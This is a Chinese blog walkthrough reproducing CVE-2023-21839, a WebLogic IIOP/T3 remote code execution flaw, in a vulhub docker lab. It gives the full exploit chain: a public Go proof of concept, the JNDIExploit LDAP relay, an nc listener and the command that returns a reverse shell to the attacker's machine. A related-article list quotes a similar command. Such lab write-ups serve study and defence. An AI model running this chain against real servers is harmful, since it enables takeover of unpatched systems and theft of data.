CVE-2023-21839 【vulhub weblogic 漏洞复现】

最新推荐文章于 2024-07-24 12:01:27 发布
最新推荐文章于 2024-07-24 12:01:27 发布
阅读量712 收藏 2
点赞数 3
文章标签: docker 安全 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65722679/article/details/131564688
版权

漏洞概述

由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。

环境搭建

contos7 (我的环境在)

进入环境

image.png

启动容器

docker-compose up -d			//启动容器		(绿色done代表启动成功)
docker-compose ps -a			//查看状态

image.png
image.png

浏览访问

靶机ip+分配端口/console
输入后等一会
地址:http://192.168.10.30:7001/console
image.png

漏洞复现

poc地址:https://github.com/4ra1n/CVE-2023-21839

下载完,拖kali里面,解压

unzip CVE-2023-21839-master.zip

image.png

kali里面安装go环境

apt install gccgo-go 
apt install golang-go

进入poc环境

image.png

编译

go build -o CVE-2023-21839

image.png
编译后
image.png

攻击命令

(-ip和-port为靶机的IP和端口,-ldap里的IP都为攻击IP,前面的端口号是中转工具的默认端口,后面为导出的端口号)

./CVE-2023-21839 -ip 192.168.xxx.xx1 -port 7001 -ldap ldap://192.168.xxx.xx2:1389/Basic/ReverseShell/192.168.xxx.xx2/7892

中转工具

JNDIExploit v1.4地址:
https://github.com/WhiteHSBG/JNDIExploit/releases/tag/v1.4
下载拖进kali里,解压
image.png
image.png
image.png

攻击

(-i为攻击机IP)

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.xxx.xx

开启中专工具监听

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.10.55

image.png

kali再开一个窗口开启监听

nc -lvnp 7892

image.png

kali再开一个窗口攻击

./CVE-2023-21839 -ip 192.168.10.30 -port 7001 -ldap ldap://192.168.10.55:1389/Basic/ReverseShell/192.168.10.55/7892

image.png

反弹shell

image.png

后谈

如果反弹不了,可能是java版本过高需要在java1.8的环境上运行
卸载原有java版本

apt-get remove openjdk*
apt autoremove

下载安装java1.8
下载链接:
https://repo.huaweicloud.com/java/jdk/8u202-b08/jdk-8u202-linux-x64.tar.gz
下载之后拖进kali里

tar -xzvf jdk-8u202-linux-x64.tar.gz			//解压
mv jdk1.8.0_202 /opt				//移动

进入对应路径
image.png
依次执行

export JAVA_HOME=/opt/jdk1.8.0_202 
export CLASSPATH=.:${JAVA_HOME}/lib
export PATH=${JAVA_HOME}/bin:$PATH

update-alternatives --install /usr/bin/java java /opt/jdk1.8.0_202/bin/java 1
update-alternatives --install /usr/bin/javac javac /opt/jdk1.8.0_202/bin/javac 1
update-alternatives --set java /opt/jdk1.8.0_202/bin/java
update-alternatives --set javac /opt/jdk1.8.0_202/bin/javac
java -version		//完成查看版本

image.png

默ran
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[ vulhub漏洞篇 ] WebLogic Server 远程代码执行漏洞 (CVE-2023-21839)
qq_51577576的博客
03-12 1620
[ vulhub漏洞篇 ] WebLogic Server 远程代码执行漏洞 (CVE-2023-21839) WebLogic是美商Oracle的主要产品之一,系购并得来。是商业市场上主要的Java应用服务器软件之一,是世界上第一个成功商业化的J2EE应用服务器,目前已推出到14c版。而此产品也延伸出WebLogic Portal, WebLogic Integration等企业用的中间件,以及OEPE开发工具。
CVE-2023-21839:Weblogic反序列化漏洞
薛定谔嘚喵博客
04-16 3935
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
CVE-2023-21839 weblogic rce漏洞
wutiangui的博客
11-04 1332
C:\Program Files\Java\jdk1.8.0_181\bin>java -jar G:\资料\vulhub\weblogic\可行工具\Weblogic-CVE-2023-21839.jar 192.168.232.131:7001 ldap://192.168.180.2:1389/Basic/ReverseShell/192.168.180.2/2000。执行以上命令可以在dnslog上获得回显,即可验证可能存在该漏洞之前请务必切换路径到jdk路径下。
log4j2远程代码执行漏洞原理与漏洞(基于vulhub,保姆级的详细教程)_log4j漏洞(1)
2401_84297899的博客
05-08 622
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!93道网络安全面试题内容实在太多,不一一截图了。
CVE-2023-21839漏洞本地简单
crowsec
02-27 5022
CVE-2023-21839漏洞
CVE-2023-21839漏洞
qq_34914659的博客
02-28 4045
CVE-2023-21839漏洞
weblogic CVE-2023-21839
m0_65096687的博客
05-25 726
1.使用工具JNDIExploit-1.2-SNAPSHOT.jar在kali上设置监听 (JNDIExploit-1.2-SNAPSHOT.jar自己下载移动到攻击机。这里是用的docker下载的vulhubCVE-2023-21839。这里需要go语言进行编译 go版本大于1.19。靶机和攻击机都是192.168.85.131。让你访问ip:7001/console。2.nc开监听反弹shell。nc上反弹了一个shell。docker 启动环境。
漏洞Weblogic CVE-2023-21839
zg_111的博客
03-23 6483
Weblogic CVE-2023-21839漏洞
Weblogic反序列化漏洞原理分析及漏洞(CVE-2018-2628/CVE-2023-21839)
rumil的博客
09-19 7723
WebLogic 存在远程代码执行漏洞CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
CVE-2023-21839】Vulhub Weblogic未授权远程代码执行漏洞
qq_43175881的博客
09-26 322
CVE-2023-21839 漏洞过程
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
CVE-2023-21839EXP可执行文件
03-11
CVE-2023-21839EXP可执行文件 CVE-2023-21839为go语言编写,须先编译为可执行文件,这里我已经编译好了,有需要的自取
docker文件挂载和宿主主机文件的关系
JAVA领域优质创作者,基于分片网络查询方法专利发明者。
07-23 1256
在排查docker日志时发在读取docker的文件时找不到文件,在宿主主机上可以查到对应的文件。这里就要理解docker文件目录和宿主主机上的文件的关系。
DockerCompose 安装环境
最新发布
一个95后开发者,热爱编程,喜欢玩游戏. 希望可以结识更多的小伙伴...
07-24 272
Docker 部署的 GitLab备份和恢
记录学习编程的日常
07-23 518
Docker 部署的 GitLab备份和恢数据使用 Docker 部署的 GitLab 可以通过 Docker 命令来进行备份和恢
CVE-2023-21839
08-17
- *1* *3* [CVE-2023-21839:Weblogic反序列化漏洞](https://blog.csdn.net/weixin_48539059/article/details/130101435)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值